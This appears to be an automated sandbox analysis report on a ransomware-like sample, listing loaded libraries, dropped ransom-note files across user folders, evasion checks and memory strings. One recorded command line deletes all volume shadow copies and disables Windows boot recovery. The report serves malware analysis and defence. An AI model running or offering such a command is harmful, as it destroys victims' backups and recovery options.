Source: C:\Users\user\Desktop\myfile.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\myfile.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\myfile.exe	Directory created: c:\program files\g165067x37-readme.txt			Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	Directory created: c:\program files\8c3ea92d.lock			Jump to behavior

Source:	Binary string: \\?\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\~ source: myfile.exe, 00000000.00000003.2024747087.0000000004343000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \\?\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: myfile.exe, 00000000.00000003.2018769602.0000000002BD7000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2024670998.0000000002BD7000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2020421518.0000000002BD7000.00000004.00000020.00020000.00000000.sdmp

Source: myfile.exe

Static PE information: section name: .s7bz

Persistence and Installation Behavior

Uses bcdedit to modify the Windows boot settings

Source: C:\Users\user\Desktop\myfile.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailures
Source: C:\Users\user\Desktop\myfile.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailures			Jump to behavior

Source: C:\Users\user\Desktop\myfile.exe	File created: C:\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\$winreagent\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\program files\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\program files (x86)\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\recovery\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\$winreagent\scratch\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\default\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\public\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\default\desktop\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\default\documents\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\default\downloads\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\default\favorites\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\default\links\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\default\music\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\default\onedrive\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\default\pictures\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\default\saved games\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\default\videos\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\.ms-ad\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\3d objects\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\contacts\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\desktop\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\documents\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\downloads\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\favorites\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\links\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\music\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\onedrive\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\pictures\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\recent\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\saved games\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\searches\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\videos\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\public\accountpictures\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\public\desktop\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\public\documents\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\public\downloads\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\public\libraries\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\public\music\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\public\pictures\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\public\videos\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\desktop\dtbzgiooso\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\desktop\dvwhkmnfnn\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\desktop\htagvdfuie\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\desktop\jsdngycowy\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\desktop\nikhqaiqau\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\desktop\onbqclyspu\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\desktop\sqrkhnbnyn\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\desktop\wkxewiotxi\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\desktop\xzxhavgrag\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\documents\dtbzgiooso\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\documents\dvwhkmnfnn\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\documents\htagvdfuie\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\documents\jsdngycowy\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\documents\nikhqaiqau\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\documents\onbqclyspu\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\documents\sqrkhnbnyn\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\documents\wkxewiotxi\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\documents\xzxhavgrag\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\favorites\links\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\pictures\camera roll\g165067x37-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File created: c:\users\user\pictures\saved pictures\g165067x37-readme.txt	Jump to behavior

Source: C:\Users\user\Desktop\myfile.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Contains functionality to detect sleep reduction / modifications

Source: C:\Users\user\Desktop\myfile.exe

Code function: 0_2_00274B55

0_2_00274B55

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\user\Desktop\myfile.exe

Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess

graph_0-3544

Source: C:\Users\user\Desktop\myfile.exe

Code function: 0_2_00274AAB rdtsc

0_2_00274AAB

Source: C:\Users\user\Desktop\myfile.exe

Window / User API: threadDelayed 10000

Jump to behavior

Source: C:\Users\user\Desktop\myfile.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

graph_0-3783

Source: C:\Users\user\Desktop\myfile.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_0-3768

Source: C:\Users\user\Desktop\myfile.exe TID: 6248

Thread sleep count: 10000 > 30

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\myfile.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\myfile.exe

Code function: 0_2_00276299 FindFirstFileW,FindNextFileW,FindClose,

0_2_00276299

Source: C:\Users\user\Desktop\myfile.exe

Code function: 0_2_00272F5E GetSystemInfo,CreateFileW,CreateFileMappingW,MapViewOfFile,UnmapViewOfFile,UnmapViewOfFile,DeleteFileW,

0_2_00272F5E

Source: C:\Users\user\Desktop\myfile.exe	File opened: C:\Windows\WinSxS\	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File opened: C:\Windows\WinSxS\Backup\amd64_microsoft-client-li..m-service.resources_31bf3856ad364e35_10.0.19041.1865_en-us_b6d4cf229ed6dfa6.manifest	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File opened: C:\Windows\WinSxS\Backup\amd64_hid-user.resources_31bf3856ad364e35_10.0.19041.1_en-gb_140ae2618f6740b3_hidserv.dll.mui_561adfc8	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File opened: C:\Windows\WinSxS\Backup\	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File opened: C:\Windows\WinSxS\Backup\amd64_microsoft-client-li..keyhelper.resources_31bf3856ad364e35_10.0.19041.1_en-us_a9723a608a71b1eb.manifest	Jump to behavior
Source: C:\Users\user\Desktop\myfile.exe	File opened: C:\Windows\WinSxS\Backup\amd64_hid-user.resources_31bf3856ad364e35_10.0.19041.1_en-gb_140ae2618f6740b3.manifest	Jump to behavior

Source: myfile.exe, 00000000.00000003.1935549106.0000000002CAD000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935066168.0000000002CA9000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-hypervcluster_31bf3856ad364e35_10.0.19041.1_none_a2ace16370124ff4\[?I!
Source: myfile.exe, 00000000.00000003.1996350688.00000000042D1000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981433036.0000000004299000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996099822.000000000429F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996308203.00000000042A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-emulatedstorage_31bf3856ad364e35_10.0.19041.1741_none_4fe99c993cb84326\r\
Source: myfile.exe, 00000000.00000003.2025040226.0000000004331000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981406776.000000000432B000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2009215768.0000000004331000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vid_31bf3856ad364e35_10.0.19041.546_none_58a869077fc6e2f7\f\
Source: myfile.exe, 00000000.00000003.1996350688.00000000042D1000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981433036.0000000004299000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996099822.000000000429F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996308203.00000000042A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.19041.2006_none_a526c6e91aabcb1b\f\
Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-hgs_31bf3856ad364e35_10.0.19041.1741_none_1bf0e7c12b78479b\2
Source: myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935066168.0000000002CA9000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935089333.0000000002CB0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vhd-parser_31bf3856ad364e35_10.0.19041.1_none_34b87765e20dcc15\
Source: myfile.exe, 00000000.00000003.1987570223.0000000004379000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1999993146.000000000438B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-hgs_31bf3856ad364e35_10.0.19041.1741_none_1bf0e7c12b78479b\f\rL
Source: myfile.exe, 00000000.00000003.2021609886.00000000042D1000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2895277692.00000000042E8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2029609937.00000000042E0000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2019171990.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2029336051.00000000042E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-driverlq
Source: myfile.exe, 00000000.00000003.1987570223.0000000004379000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-kmclr_31bf3856ad364e35_10.0.19041.1889_none_46e4953b6f70cc79\f\
Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..-client.snapinabout_31bf3856ad364e35_10.0.19041.1_none_43a9017744e82ca8\/
Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-h..t-service.resources_31bf3856ad364e35_10.0.19041.1_en-us_ddaeabc80a3525d6\/
Source: myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935066168.0000000002CA9000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935089333.0000000002CB0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-lun-parser_31bf3856ad364e35_10.0.19041.1_none_b6d8bfc73f89cc96\
Source: myfile.exe, 00000000.00000003.1980534561.0000000002BF3000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1942504657.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981082622.0000000002C0C000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1988873951.0000000002C17000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-windows-hyper-v-vfpext_31bf3856ad364e35_10.0.19041.1741_none_7543ca68a11c7040\f\
Source: myfile.exe, 00000000.00000003.2382483791.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2468286003.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503677440.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600172847.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365373242.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354497266.0000000001023000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW\*lient
Source: myfile.exe, 00000000.00000003.1996350688.00000000042D1000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981433036.0000000004299000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996099822.000000000429F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996308203.00000000042A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-i..ationcomponents-rdv_31bf3856ad364e35_10.0.19041.1741_none_b62736d427ac1a0c\f\D
Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..t-clients.resources_31bf3856ad364e35_10.0.19041.1_en-us_a3e0d97c4c052586\o
Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-kmclr_31bf3856ad364e35_10.0.19041.1889_none_46e4953b6f70cc79\
Source: myfile.exe, 00000000.00000003.1941819772.0000000003153000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-windows-hyper-v-vfpext_31bf3856ad364e35_10.0.19041.1741_none_7543ca68a11c7040\
Source: myfile.exe, 00000000.00000003.1981406776.000000000432B000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1987597314.0000000004347000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-config_31bf3856ad364e35_10.0.19041.928_none_d35bf07ab5380c24\f\
Source: myfile.exe, 00000000.00000003.1996350688.00000000042D1000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981433036.0000000004299000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996099822.000000000429F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996308203.00000000042A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..t-remotefilebrowser_31bf3856ad364e35_10.0.19041.746_none_6fbcad1699b89a67\f\
Source: myfile.exe, 00000000.00000003.1981406776.000000000432B000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1987597314.0000000004347000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-debug_31bf3856ad364e35_10.0.19041.1741_none_78a9b11b7a3cc41b\f\
Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-v..izationv2.resources_31bf3856ad364e35_10.0.19041.1_en-gb_7788797720472f2d\
Source: myfile.exe, 00000000.00000003.2021609886.00000000042D1000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2895277692.00000000042E8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2029609937.00000000042E0000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2019171990.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2029336051.00000000042E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: indows\WinSxS\amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.19041.2006_none_a526c6e91aabcb1b\f\
Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.19041.2006_none_a526c6e91aabcb1b\
